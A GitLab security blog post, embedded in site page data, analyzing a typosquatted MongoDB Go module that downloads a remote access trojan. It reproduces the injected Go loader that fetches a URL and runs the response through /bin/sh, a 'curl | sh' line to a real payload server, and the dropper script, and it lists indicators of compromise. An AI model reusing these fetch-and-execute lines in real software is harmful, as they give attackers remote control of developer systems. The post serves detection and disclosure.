[{"data":1,"prerenderedAt":701},["ShallowReactive",2],{"/en-us/blog/gitlab-catches-mongodb-go-module-supply-chain-attack/":3,"navigation-en-us":31,"banner-en-us":447,"footer-en-us":462,"Michael Henriksen":673,"next-steps-en-us":686},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"seo":8,"content":11,"config":20,"_id":24,"_type":25,"title":26,"_source":27,"_file":28,"_stem":29,"_extension":30},"/en-us/blog/gitlab-catches-mongodb-go-module-supply-chain-attack","blog",false,"",{"noIndex":6,"title":9,"description":10},"GitLab catches MongoDB Go module supply chain attack","Learn how GitLab detected a supply chain attack targeting Go developers through fake MongoDB drivers that deploy persistent backdoor malware.",{"title":9,"description":10,"authors":12,"heroImage":14,"body":15,"category":16,"tags":17,"date":19},[13],"Michael Henriksen","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750098739/Blog/Hero%20Images/Blog/Hero%20Images/AdobeStock_282096522_securitycompliance.jpeg_1750098739024.jpg","Software supply chain attacks via malicious dependencies continue to be one of the most significant security threats to modern software development. The widespread use of open source components has enabled development teams to build applications rapidly, but it has also widened the attack surface area. The growing ecosystem of third-party packages presents numerous opportunities for attackers to exploit dependencies through techniques like typosquatting, dependency confusion, and package impersonation, making it increasingly challenging for developers to distinguish legitimate packages from malicious imposters.\n\nTo address this challenge, GitLab's Vulnerability Research team recently developed an automated detection system designed to proactively identify malicious dependencies in software supply chains. The system combines multiple detection techniques that work in concert:\n\n- Automated typosquatting detection, which identifies suspicious naming patterns\n- Semantic code analysis, which flags potentially malicious behaviors like network requests or command executions\n- AI-assisted initial screening for advanced payload and obfuscation detection\n\nThis multi-layered approach is used by the vulnerability research team to continuously scan newly published dependencies across major ecosystems, providing early warning of supply chain attacks.\n\nUsing this detection system, GitLab recently identified a live typosquatting attack in the wild that leveraged a malicious MongoDB Go module. Below are details on the attack and how GitLab works to keep supply chains safe.\n\n## Executive summary: A MongoDB module that's not quite right\n\nOur detection system flagged a newly published Go module called `github.com/qiniiu/qmgo`, closely mimicking the popular [MongoDB](https://www.mongodb.com/) module `github.com/qiniu/qmgo`. The legitimate module describes itself as \"The Go driver for MongoDB\" and has gained traction in the Go community.\n\nTo disguise the malicious module as legitimate, the threat actor used a GitHub username nearly identical to the one associated with the real module with one subtle change: they added one “i” (`qiniu` → `qiniiu`). To the casual observer scrolling through search results or auto-complete suggestions, this difference would be very easy to overlook.\n\nThe new module’s code was a working copy of the legitimate `qmgo` module. However, malicious code was inserted into the `NewClient` function in `client.go`, a function that developers would naturally call when initializing their MongoDB connection. Concealing malicious code within a function made the payload less likely to be executed during potential runtime security analysis, while ensuring that it would execute from normal usage in real applications.\n\nAfter reporting the malicious module, it was removed within approximately 19 hours of our initial report. However, the threat actor quickly adapted, publishing a second typosquatted version (`github.com/qiiniu/qmgo`) just four days later with identical malicious code. This follow-up attack was also detected and taken down roughly one hour after initial discovery. The rapid redeployment demonstrates the persistent nature of these attacks and highlights why proactive detection is crucial in minimizing exposure windows.\n\n## Technical deep dive: Peeling back the layers\n\nThe threat actor took steps to hide the attack. The malicious payload used a multilayered approach, starting with a compact code snippet that triggered a chain of remote payload downloads:\n\n```go  \ntxt, err := script.Get(\"https://raw.githubusercontent.com/qiiniu/vue-element-admin/refs/heads/main/public/update.html\").String()  \nif err == nil {  \n    txt2, err := script.Get(string(strings.Replace(txt, \"\\n\", \"\", -1))).String()  \n    if err == nil {  \n        exec.Command(\"/bin/sh\", \"-c\", string(txt2)).Start()  \n    }  \n}  \n```\n\nThe attack unfolds in four distinct layers:\n\n**Layer 1:** The code fetches `update.html` from another repository owned by the typosquat account `qiiniu/vue-element-admin`. The file contained a single line: \n\n```  \nhttps://img.googlex.cloud/seed.php\n```\n\n**Layer 2:** The code then fetches `https://img.googlex.cloud/seed.php`, which returns a single shell command, which is executed: \n\n```bash  \ncurl -s http://207.148.110.29:80/logon61.gif|sh\n```\n\n**Layer 3:** The command tells the system to fetch `http://207.148.110.29:80/logon61.gif` using curl and execute the response as a shell script.  The shell script downloads what appears to be an MP3 file (`chainelli.mp3`) to `/tmp/vod`, makes it executable, runs it, and immediately deletes it:\n\n```bash  \n#!/bin/sh  \nrm -rf /tmp/vod  \ncurl -s http://207.148.110.29:80/chainelli.mp3 -o /tmp/vod  \nchmod 777 /tmp/vod  \n/tmp/vod  \nrm -rf /tmp/vod  \n```\n\n**Layer 4:** The `chainelli.mp3` file is actually a statically-linked, stripped ELF Go binary designed to establish persistent remote access. Once executed, the malware attempts to connect to its command and control server at `ellipal.spoolsv.cyou` on Port 443 (both TCP and UDP), using a custom encrypted communication protocol with a hardcoded RSA key. From there, it provides the threat actor with remote administration capabilities:\n\n* Complete remote shell access and one-off command execution  \n* Screenshot captures  \n* SOCKS proxy functionality to make connections through the compromised machine  \n* Configurable sleep interval between check-ins with the command and control server to avoid detection  \n* Standard remote access trojan features like filesystem browsing and upload/download\n\n## They're back (already)\n\nJust four days after GitLab reported the initial malicious module and saw it removed, `github.com/qiiniu/qmgo` appeared – the second typosquatted version with identical malicious code. This quick redeployment demonstrates the persistent nature of these attacks and highlights how threat actors adapt quickly to takedown efforts.\n\n## GitLab’s approach: Finding needles in haystacks\n\nThe initial discovery and persistence of this attack validated our approach to proactive dependency monitoring and threat detection. GitLab’s detection system combines multiple techniques to identify malicious dependencies:\n\n**Typosquatting detection:** GitLab monitors newly published dependencies and looks for packages that exhibit signs of various typosquatting strategies.\n\n**Semantic heuristics:** Our system statically analyzes code for patterns like network requests, command executions, and other behaviors typical of malicious payloads.\n\n**AI-assisted analysis:** A [large language model](https://about.gitlab.com/blog/what-is-a-large-language-model-llm/) does the initial analysis of the suspicious parts of the code to help us weed out obvious false positives, detect complex payloads, and identify obfuscation techniques used to hide malicious intent.\n\n**Human review:** A human receives an alert to verify the finding and to perform advanced analysis.\n\n## Recommendations: Staying ahead of persistent supply chain threats\n\nThis attack highlights the ongoing challenges in securing software supply chains. The multilayered obfuscation and rapid redeployment after takedown demonstrate that threat actors are willing to invest significant effort in targeting popular dependencies.\n\nThe quick pivot to new typosquatted packages after our initial report highlights a fundamental weakness in the current ecosystems: package managers typically only remove malicious dependencies after they've been published, discovered, and reported by the community. This reactive approach leaves a dangerous window where developers can unknowingly consume compromised packages. Proactive monitoring and detection systems like the one GitLab has developed can help close this gap by identifying threats during the publication process itself.\n\nWe've provided indicators of compromise (IOCs) in the next section, which you can use in your monitoring systems to detect this specific campaign.\n\n## Indicators of compromise\n\n| IOC | Description |\n| :---- | :---- |\n| `github.com/qiniiu/qmgo` | Malicious Go module |\n| `github.com/qiiniu/qmgo` | Malicious Go module |\n| `https://raw.githubusercontent.com/qiniiu/vue-element-admin/refs/heads/main/public/update.html` | Payload delivery URL |\n| `https://raw.githubusercontent.com/qiiniu/vue-element-admin/refs/heads/main/public/update.html` | Payload delivery URL |\n| `https://img.googlex.cloud/seed.php` | Payload delivery URL |\n| `http://207.148.110.29:80/logon61.gif` | Payload delivery URL |\n| `http://207.148.110.29:80/chainelli.mp3` | Payload delivery URL |\n| `img.googlex.cloud` | Payload delivery host |\n| `207.148.110.29` | Payload delivery host |\n| `ellipal.spoolsv.cyou` | Command & Control host |\n| `6ada952c592f286692c59028c5e0fc3fa589759f` | SHA-1 checksum of chainelli.mp3 remote administration malware |\n| `8ae533e2d1d89c871908cbcf5c7d89c433d09b2e7f7d4ade3aef46c55b66509c` | SHA-256 checksum of chainelli.mp3 remote administration malware |\n| `/tmp/vod` | Temporary download location of chainelli.mp3 remote administration malware |\n\n## How GitLab helps secure the software supply chain \n\nMalicious dependencies, like the MongoDB Go module attack, highlight why securing the software supply chain requires more than just CVE monitoring. GitLab’s DevSecOps platform includes [Application Security Testing](https://docs.gitlab.com/user/application_security/secure_your_application/) scanners like Software Composition Analysis in the development lifecycle, helping teams catch vulnerable or malicious packages before they reach production. \n\nPaired with research efforts like this, GitLab aims to enable developers to build applications that are secure from the start without compromising on development velocity. \n\n## Timeline\n\n* **2025-06-01T09:31:** GitLab reports `github.com/qiniiu/qmgo` to Go Security  \n* **2025-06-01T09:43:** GitLab reports `github.com/qiniiu/qmgo` to GitHub  \n* **2025-06-01T10:14:** GitLab reports `ellipal.spoolsv.cyou` (`188.166.213.194`) to the IP block owner \n* **2025-06-02T04:03:** Go Security takes down `github.com/qiniiu/qmgo`\n* **2025-06-02T09:57:** The IP block owner suspends `188.166.213.194`\n* **2025-06-03T09:15:** GitHub suspends `github.com/qiniiu`\n* **2025-06-05T17:15:** GitLab reports `github.com/qiiniu/qmgo` to Go Security  \n* **2025-06-05T17:33:** GitLab reports `github.com/qiiniu/qmgo` to GitHub  \n* **2025-06-05T17:45:** Go Security takes down `github.com/qiiniu/qmgo`\n* **2025-06-06T12:25:** GitHub suspends `github.com/qiiniu`","security",[16,18],"product","2025-06-30",{"featured":21,"template":22,"slug":23},true,"BlogPost","gitlab-catches-mongodb-go-module-supply-chain-attack","content:en-us:blog:gitlab-catches-mongodb-go-module-supply-chain-attack.yml","yaml","Gitlab Catches Mongodb Go Module Supply Chain Attack","content","en-us/blog/gitlab-catches-mongodb-go-module-supply-chain-attack.yml","en-us/blog/gitlab-catches-mongodb-go-module-supply-chain-attack","yml",{"_path":32,"_dir":33,"_draft":6,"_partial":6,"_locale":7,"data":34,"_id":443,"_type":25,"title":444,"_source":27,"_file":445,"_stem":446,"_extension":30},"/shared/en-us/main-navigation","en-us",{"logo":35,"freeTrial":40,"sales":45,"login":50,"items":55,"search":384,"minimal":415,"duo":434},{"config":36},{"href":37,"dataGaName":38,"dataGaLocation":39},"/","gitlab logo","header",{"text":41,"config":42},"Get free trial",{"href":43,"dataGaName":44,"dataGaLocation":39},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com&glm_content=default-saas-trial/","free trial",{"text":46,"config":47},"Talk to sales",{"href":48,"dataGaName":49,"dataGaLocation":39},"/sales/","sales",{"text":51,"config":52},"Sign in",{"href":53,"dataGaName":54,"dataGaLocation":39},"https://gitlab.com/users/sign_in/","sign in",[56,100,195,200,305,365],{"text":57,"config":58,"cards":60,"footer":83},"Platform",{"dataNavLevelOne":59},"platform",[61,67,75],{"title":57,"description":62,"link":63},"The most comprehensive AI-powered DevSecOps Platform",{"text":64,"config":65},"Explore our Platform",{"href":66,"dataGaName":59,"dataGaLocation":39},"/platform/",{"title":68,"description":69,"link":70},"GitLab Duo (AI)","Build software faster with AI at every stage of development",{"text":71,"config":72},"Meet GitLab Duo",{"href":73,"dataGaName":74,"dataGaLocation":39},"/gitlab-duo/","gitlab duo ai",{"title":76,"description":77,"link":78},"Why GitLab","10 reasons why Enterprises choose GitLab",{"text":79,"config":80},"Learn more",{"href":81,"dataGaName":82,"dataGaLocation":39},"/why-gitlab/","why gitlab",{"title":84,"items":85},"Get started with",[86,91,96],{"text":87,"config":88},"Platform Engineering",{"href":89,"dataGaName":90,"dataGaLocation":39},"/solutions/platform-engineering/","platform engineering",{"text":92,"config":93},"Developer Experience",{"href":94,"dataGaName":95,"dataGaLocation":39},"/developer-experience/","Developer experience",{"text":97,"config":98},"MLOps",{"href":99,"dataGaName":97,"dataGaLocation":39},"/topics/devops/the-role-of-ai-in-devops/",{"text":101,"left":21,"config":102,"link":104,"lists":108,"footer":177},"Product",{"dataNavLevelOne":103},"solutions",{"text":105,"config":106},"View all Solutions",{"href":107,"dataGaName":103,"dataGaLocation":39},"/solutions/",[109,134,156],{"title":110,"description":111,"link":112,"items":117},"Automation","CI/CD and automation to accelerate deployment",{"config":113},{"icon":114,"href":115,"dataGaName":116,"dataGaLocation":39},"AutomatedCodeAlt","/solutions/delivery-automation/","automated software delivery",[118,122,126,130],{"text":119,"config":120},"CI/CD",{"href":121,"dataGaLocation":39,"dataGaName":119},"/solutions/continuous-integration/",{"text":123,"config":124},"AI-Assisted Development",{"href":73,"dataGaLocation":39,"dataGaName":125},"AI assisted development",{"text":127,"config":128},"Source Code Management",{"href":129,"dataGaLocation":39,"dataGaName":127},"/solutions/source-code-management/",{"text":131,"config":132},"Automated Software Delivery",{"href":115,"dataGaLocation":39,"dataGaName":133},"Automated software delivery",{"title":135,"description":136,"link":137,"items":142},"Security","Deliver code faster without compromising security",{"config":138},{"href":139,"dataGaName":140,"dataGaLocation":39,"icon":141},"/solutions/security-compliance/","security and compliance","ShieldCheckLight",[143,146,151],{"text":144,"config":145},"Security & Compliance",{"href":139,"dataGaLocation":39,"dataGaName":144},{"text":147,"config":148},"Software Supply Chain Security",{"href":149,"dataGaLocation":39,"dataGaName":150},"/solutions/supply-chain/","Software supply chain security",{"text":152,"config":153},"Compliance & Governance",{"href":154,"dataGaLocation":39,"dataGaName":155},"/solutions/continuous-software-compliance/","Compliance and governance",{"title":157,"link":158,"items":163},"Measurement",{"config":159},{"icon":160,"href":161,"dataGaName":162,"dataGaLocation":39},"DigitalTransformation","/solutions/visibility-measurement/","visibility and measurement",[164,168,172],{"text":165,"config":166},"Visibility & Measurement",{"href":161,"dataGaLocation":39,"dataGaName":167},"Visibility and Measurement",{"text":169,"config":170},"Value Stream Management",{"href":171,"dataGaLocation":39,"dataGaName":169},"/solutions/value-stream-management/",{"text":173,"config":174},"Analytics & Insights",{"href":175,"dataGaLocation":39,"dataGaName":176},"/solutions/analytics-and-insights/","Analytics and insights",{"title":178,"items":179},"GitLab for",[180,185,190],{"text":181,"config":182},"Enterprise",{"href":183,"dataGaLocation":39,"dataGaName":184},"/enterprise/","enterprise",{"text":186,"config":187},"Small Business",{"href":188,"dataGaLocation":39,"dataGaName":189},"/small-business/","small business",{"text":191,"config":192},"Public Sector",{"href":193,"dataGaLocation":39,"dataGaName":194},"/solutions/public-sector/","public sector",{"text":196,"config":197},"Pricing",{"href":198,"dataGaName":199,"dataGaLocation":39,"dataNavLevelOne":199},"/pricing/","pricing",{"text":201,"config":202,"link":204,"lists":208,"feature":292},"Resources",{"dataNavLevelOne":203},"resources",{"text":205,"config":206},"View all resources",{"href":207,"dataGaName":203,"dataGaLocation":39},"/resources/",[209,242,264],{"title":210,"items":211},"Getting started",[212,217,222,227,232,237],{"text":213,"config":214},"Install",{"href":215,"dataGaName":216,"dataGaLocation":39},"/install/","install",{"text":218,"config":219},"Quick start guides",{"href":220,"dataGaName":221,"dataGaLocation":39},"/get-started/","quick setup checklists",{"text":223,"config":224},"Learn",{"href":225,"dataGaLocation":39,"dataGaName":226},"https://university.gitlab.com/","learn",{"text":228,"config":229},"Product documentation",{"href":230,"dataGaName":231,"dataGaLocation":39},"https://docs.gitlab.com/","product documentation",{"text":233,"config":234},"Best practice videos",{"href":235,"dataGaName":236,"dataGaLocation":39},"/getting-started-videos/","best practice videos",{"text":238,"config":239},"Integrations",{"href":240,"dataGaName":241,"dataGaLocation":39},"/integrations/","integrations",{"title":243,"items":244},"Discover",[245,250,254,259],{"text":246,"config":247},"Customer success stories",{"href":248,"dataGaName":249,"dataGaLocation":39},"/customers/","customer success stories",{"text":251,"config":252},"Blog",{"href":253,"dataGaName":5,"dataGaLocation":39},"/blog/",{"text":255,"config":256},"Remote",{"href":257,"dataGaName":258,"dataGaLocation":39},"https://handbook.gitlab.com/handbook/company/culture/all-remote/","remote",{"text":260,"config":261},"TeamOps",{"href":262,"dataGaName":263,"dataGaLocation":39},"/teamops/","teamops",{"title":265,"items":266},"Connect",[267,272,277,282,287],{"text":268,"config":269},"GitLab Services",{"href":270,"dataGaName":271,"dataGaLocation":39},"/services/","services",{"text":273,"config":274},"Community",{"href":275,"dataGaName":276,"dataGaLocation":39},"/community/","community",{"text":278,"config":279},"Forum",{"href":280,"dataGaName":281,"dataGaLocation":39},"https://forum.gitlab.com/","forum",{"text":283,"config":284},"Events",{"href":285,"dataGaName":286,"dataGaLocation":39},"/events/","events",{"text":288,"config":289},"Partners",{"href":290,"dataGaName":291,"dataGaLocation":39},"/partners/","partners",{"backgroundColor":293,"textColor":294,"text":295,"image":296,"link":300},"#2f2a6b","#fff","Insights for the future of software development",{"altText":297,"config":298},"the source promo card",{"src":299},"/images/navigation/the-source-promo-card.svg",{"text":301,"config":302},"Read the latest",{"href":303,"dataGaName":304,"dataGaLocation":39},"/the-source/","the source",{"text":306,"config":307,"lists":309},"Company",{"dataNavLevelOne":308},"company",[310],{"items":311},[312,317,323,325,330,335,340,345,350,355,360],{"text":313,"config":314},"About",{"href":315,"dataGaName":316,"dataGaLocation":39},"/company/","about",{"text":318,"config":319,"footerGa":322},"Jobs",{"href":320,"dataGaName":321,"dataGaLocation":39},"/jobs/","jobs",{"dataGaName":321},{"text":283,"config":324},{"href":285,"dataGaName":286,"dataGaLocation":39},{"text":326,"config":327},"Leadership",{"href":328,"dataGaName":329,"dataGaLocation":39},"/company/team/e-group/","leadership",{"text":331,"config":332},"Team",{"href":333,"dataGaName":334,"dataGaLocation":39},"/company/team/","team",{"text":336,"config":337},"Handbook",{"href":338,"dataGaName":339,"dataGaLocation":39},"https://handbook.gitlab.com/","handbook",{"text":341,"config":342},"Investor relations",{"href":343,"dataGaName":344,"dataGaLocation":39},"https://ir.gitlab.com/","investor relations",{"text":346,"config":347},"Trust Center",{"href":348,"dataGaName":349,"dataGaLocation":39},"/security/","trust center",{"text":351,"config":352},"AI Transparency Center",{"href":353,"dataGaName":354,"dataGaLocation":39},"/ai-transparency-center/","ai transparency center",{"text":356,"config":357},"Newsletter",{"href":358,"dataGaName":359,"dataGaLocation":39},"/company/contact/","newsletter",{"text":361,"config":362},"Press",{"href":363,"dataGaName":364,"dataGaLocation":39},"/press/","press",{"text":366,"config":367,"lists":368},"Contact us",{"dataNavLevelOne":308},[369],{"items":370},[371,374,379],{"text":46,"config":372},{"href":48,"dataGaName":373,"dataGaLocation":39},"talk to sales",{"text":375,"config":376},"Get help",{"href":377,"dataGaName":378,"dataGaLocation":39},"/support/","get help",{"text":380,"config":381},"Customer portal",{"href":382,"dataGaName":383,"dataGaLocation":39},"https://customers.gitlab.com/customers/sign_in/","customer portal",{"close":385,"login":386,"suggestions":393},"Close",{"text":387,"link":388},"To search repositories and projects, login to",{"text":389,"config":390},"gitlab.com",{"href":53,"dataGaName":391,"dataGaLocation":392},"search login","search",{"text":394,"default":395},"Suggestions",[396,398,402,404,408,412],{"text":68,"config":397},{"href":73,"dataGaName":68,"dataGaLocation":392},{"text":399,"config":400},"Code Suggestions (AI)",{"href":401,"dataGaName":399,"dataGaLocation":392},"/solutions/code-suggestions/",{"text":119,"config":403},{"href":121,"dataGaName":119,"dataGaLocation":392},{"text":405,"config":406},"GitLab on AWS",{"href":407,"dataGaName":405,"dataGaLocation":392},"/partners/technology-partners/aws/",{"text":409,"config":410},"GitLab on Google Cloud",{"href":411,"dataGaName":409,"dataGaLocation":392},"/partners/technology-partners/google-cloud-platform/",{"text":413,"config":414},"Why GitLab?",{"href":81,"dataGaName":413,"dataGaLocation":392},{"freeTrial":416,"mobileIcon":421,"desktopIcon":426,"secondaryButton":429},{"text":417,"config":418},"Start free trial",{"href":419,"dataGaName":44,"dataGaLocation":420},"https://gitlab.com/-/trials/new/","nav",{"altText":422,"config":423},"Gitlab Icon",{"src":424,"dataGaName":425,"dataGaLocation":420},"/images/brand/gitlab-logo-tanuki.svg","gitlab icon",{"altText":422,"config":427},{"src":428,"dataGaName":425,"dataGaLocation":420},"/images/brand/gitlab-logo-type.svg",{"text":430,"config":431},"Get Started",{"href":432,"dataGaName":433,"dataGaLocation":420},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com/compare/gitlab-vs-github/","get started",{"freeTrial":435,"mobileIcon":439,"desktopIcon":441},{"text":436,"config":437},"Learn more about GitLab Duo",{"href":73,"dataGaName":438,"dataGaLocation":420},"gitlab duo",{"altText":422,"config":440},{"src":424,"dataGaName":425,"dataGaLocation":420},{"altText":422,"config":442},{"src":428,"dataGaName":425,"dataGaLocation":420},"content:shared:en-us:main-navigation.yml","Main Navigation","shared/en-us/main-navigation.yml","shared/en-us/main-navigation",{"_path":448,"_dir":33,"_draft":6,"_partial":6,"_locale":7,"title":449,"button":450,"image":454,"config":457,"_id":459,"_type":25,"_source":27,"_file":460,"_stem":461,"_extension":30},"/shared/en-us/banner","is now in public beta!",{"text":79,"config":451},{"href":452,"dataGaName":453,"dataGaLocation":39},"/gitlab-duo/agent-platform/","duo banner",{"config":455},{"src":456},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1753720689/somrf9zaunk0xlt7ne4x.svg",{"layout":458},"release","content:shared:en-us:banner.yml","shared/en-us/banner.yml","shared/en-us/banner",{"_path":463,"_dir":33,"_draft":6,"_partial":6,"_locale":7,"data":464,"_id":669,"_type":25,"title":670,"_source":27,"_file":671,"_stem":672,"_extension":30},"/shared/en-us/main-footer",{"text":465,"source":466,"edit":472,"contribute":477,"config":482,"items":487,"minimal":661},"Git is a trademark of Software Freedom Conservancy and our use of 'GitLab' is under license",{"text":467,"config":468},"View page source",{"href":469,"dataGaName":470,"dataGaLocation":471},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/","page source","footer",{"text":473,"config":474},"Edit this page",{"href":475,"dataGaName":476,"dataGaLocation":471},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/content/","web ide",{"text":478,"config":479},"Please contribute",{"href":480,"dataGaName":481,"dataGaLocation":471},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/CONTRIBUTING.md/","please contribute",{"twitter":483,"facebook":484,"youtube":485,"linkedin":486},"https://twitter.com/gitlab","https://www.facebook.com/gitlab","https://www.youtube.com/channel/UCnMGQ8QHMAnVIsI3xJrihhg","https://www.linkedin.com/company/gitlab-com",[488,511,568,597,631],{"title":57,"links":489,"subMenu":494},[490],{"text":491,"config":492},"DevSecOps platform",{"href":66,"dataGaName":493,"dataGaLocation":471},"devsecops platform",[495],{"title":196,"links":496},[497,501,506],{"text":498,"config":499},"View plans",{"href":198,"dataGaName":500,"dataGaLocation":471},"view plans",{"text":502,"config":503},"Why Premium?",{"href":504,"dataGaName":505,"dataGaLocation":471},"/pricing/premium/","why premium",{"text":507,"config":508},"Why Ultimate?",{"href":509,"dataGaName":510,"dataGaLocation":471},"/pricing/ultimate/","why ultimate",{"title":512,"links":513},"Solutions",[514,519,522,524,529,534,538,541,545,550,552,555,558,563],{"text":515,"config":516},"Digital transformation",{"href":517,"dataGaName":518,"dataGaLocation":471},"/topics/digital-transformation/","digital transformation",{"text":144,"config":520},{"href":139,"dataGaName":521,"dataGaLocation":471},"security & compliance",{"text":133,"config":523},{"href":115,"dataGaName":116,"dataGaLocation":471},{"text":525,"config":526},"Agile development",{"href":527,"dataGaName":528,"dataGaLocation":471},"/solutions/agile-delivery/","agile delivery",{"text":530,"config":531},"Cloud transformation",{"href":532,"dataGaName":533,"dataGaLocation":471},"/topics/cloud-native/","cloud transformation",{"text":535,"config":536},"SCM",{"href":129,"dataGaName":537,"dataGaLocation":471},"source code management",{"text":119,"config":539},{"href":121,"dataGaName":540,"dataGaLocation":471},"continuous integration & delivery",{"text":542,"config":543},"Value stream management",{"href":171,"dataGaName":544,"dataGaLocation":471},"value stream management",{"text":546,"config":547},"GitOps",{"href":548,"dataGaName":549,"dataGaLocation":471},"/solutions/gitops/","gitops",{"text":181,"config":551},{"href":183,"dataGaName":184,"dataGaLocation":471},{"text":553,"config":554},"Small business",{"href":188,"dataGaName":189,"dataGaLocation":471},{"text":556,"config":557},"Public sector",{"href":193,"dataGaName":194,"dataGaLocation":471},{"text":559,"config":560},"Education",{"href":561,"dataGaName":562,"dataGaLocation":471},"/solutions/education/","education",{"text":564,"config":565},"Financial services",{"href":566,"dataGaName":567,"dataGaLocation":471},"/solutions/finance/","financial services",{"title":201,"links":569},[570,572,574,576,579,581,583,585,587,589,591,593,595],{"text":213,"config":571},{"href":215,"dataGaName":216,"dataGaLocation":471},{"text":218,"config":573},{"href":220,"dataGaName":221,"dataGaLocation":471},{"text":223,"config":575},{"href":225,"dataGaName":226,"dataGaLocation":471},{"text":228,"config":577},{"href":230,"dataGaName":578,"dataGaLocation":471},"docs",{"text":251,"config":580},{"href":253,"dataGaName":5,"dataGaLocation":471},{"text":246,"config":582},{"href":248,"dataGaName":249,"dataGaLocation":471},{"text":255,"config":584},{"href":257,"dataGaName":258,"dataGaLocation":471},{"text":268,"config":586},{"href":270,"dataGaName":271,"dataGaLocation":471},{"text":260,"config":588},{"href":262,"dataGaName":263,"dataGaLocation":471},{"text":273,"config":590},{"href":275,"dataGaName":276,"dataGaLocation":471},{"text":278,"config":592},{"href":280,"dataGaName":281,"dataGaLocation":471},{"text":283,"config":594},{"href":285,"dataGaName":286,"dataGaLocation":471},{"text":288,"config":596},{"href":290,"dataGaName":291,"dataGaLocation":471},{"title":306,"links":598},[599,601,603,605,607,609,611,615,620,622,624,626],{"text":313,"config":600},{"href":315,"dataGaName":308,"dataGaLocation":471},{"text":318,"config":602},{"href":320,"dataGaName":321,"dataGaLocation":471},{"text":326,"config":604},{"href":328,"dataGaName":329,"dataGaLocation":471},{"text":331,"config":606},{"href":333,"dataGaName":334,"dataGaLocation":471},{"text":336,"config":608},{"href":338,"dataGaName":339,"dataGaLocation":471},{"text":341,"config":610},{"href":343,"dataGaName":344,"dataGaLocation":471},{"text":612,"config":613},"Sustainability",{"href":614,"dataGaName":612,"dataGaLocation":471},"/sustainability/",{"text":616,"config":617},"Diversity, inclusion and belonging (DIB)",{"href":618,"dataGaName":619,"dataGaLocation":471},"/diversity-inclusion-belonging/","Diversity, inclusion and belonging",{"text":346,"config":621},{"href":348,"dataGaName":349,"dataGaLocation":471},{"text":356,"config":623},{"href":358,"dataGaName":359,"dataGaLocation":471},{"text":361,"config":625},{"href":363,"dataGaName":364,"dataGaLocation":471},{"text":627,"config":628},"Modern Slavery Transparency Statement",{"href":629,"dataGaName":630,"dataGaLocation":471},"https://handbook.gitlab.com/handbook/legal/modern-slavery-act-transparency-statement/","modern slavery transparency statement",{"title":632,"links":633},"Contact Us",[634,637,639,641,646,651,656],{"text":635,"config":636},"Contact an expert",{"href":48,"dataGaName":49,"dataGaLocation":471},{"text":375,"config":638},{"href":377,"dataGaName":378,"dataGaLocation":471},{"text":380,"config":640},{"href":382,"dataGaName":383,"dataGaLocation":471},{"text":642,"config":643},"Status",{"href":644,"dataGaName":645,"dataGaLocation":471},"https://status.gitlab.com/","status",{"text":647,"config":648},"Terms of use",{"href":649,"dataGaName":650,"dataGaLocation":471},"/terms/","terms of use",{"text":652,"config":653},"Privacy statement",{"href":654,"dataGaName":655,"dataGaLocation":471},"/privacy/","privacy statement",{"text":657,"config":658},"Cookie preferences",{"dataGaName":659,"dataGaLocation":471,"id":660,"isOneTrustButton":21},"cookie preferences","ot-sdk-btn",{"items":662},[663,665,667],{"text":647,"config":664},{"href":649,"dataGaName":650,"dataGaLocation":471},{"text":652,"config":666},{"href":654,"dataGaName":655,"dataGaLocation":471},{"text":657,"config":668},{"dataGaName":659,"dataGaLocation":471,"id":660,"isOneTrustButton":21},"content:shared:en-us:main-footer.yml","Main Footer","shared/en-us/main-footer.yml","shared/en-us/main-footer",[674],{"_path":675,"_dir":676,"_draft":6,"_partial":6,"_locale":7,"content":677,"config":681,"_id":683,"_type":25,"title":13,"_source":27,"_file":684,"_stem":685,"_extension":30},"/en-us/blog/authors/michael-henriksen","authors",{"name":13,"config":678},{"headshot":679,"ctfId":680},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659488/Blog/Author%20Headshots/gitlab-logo-extra-whitespace.png","3DmojnawcJFqAgoNMCpFTX",{"template":682},"BlogAuthor","content:en-us:blog:authors:michael-henriksen.yml","en-us/blog/authors/michael-henriksen.yml","en-us/blog/authors/michael-henriksen",{"_path":687,"_dir":33,"_draft":6,"_partial":6,"_locale":7,"header":688,"eyebrow":689,"blurb":690,"button":691,"secondaryButton":695,"_id":697,"_type":25,"title":698,"_source":27,"_file":699,"_stem":700,"_extension":30},"/shared/en-us/next-steps","Start shipping better software faster","50%+ of the Fortune 100 trust GitLab","See what your team can do with the intelligent\n\n\nDevSecOps platform.\n",{"text":41,"config":692},{"href":693,"dataGaName":44,"dataGaLocation":694},"https://gitlab.com/-/trial_registrations/new?glm_content=default-saas-trial&glm_source=about.gitlab.com/","feature",{"text":46,"config":696},{"href":48,"dataGaName":49,"dataGaLocation":694},"content:shared:en-us:next-steps.yml","Next Steps","shared/en-us/next-steps.yml","shared/en-us/next-steps",1753981640538]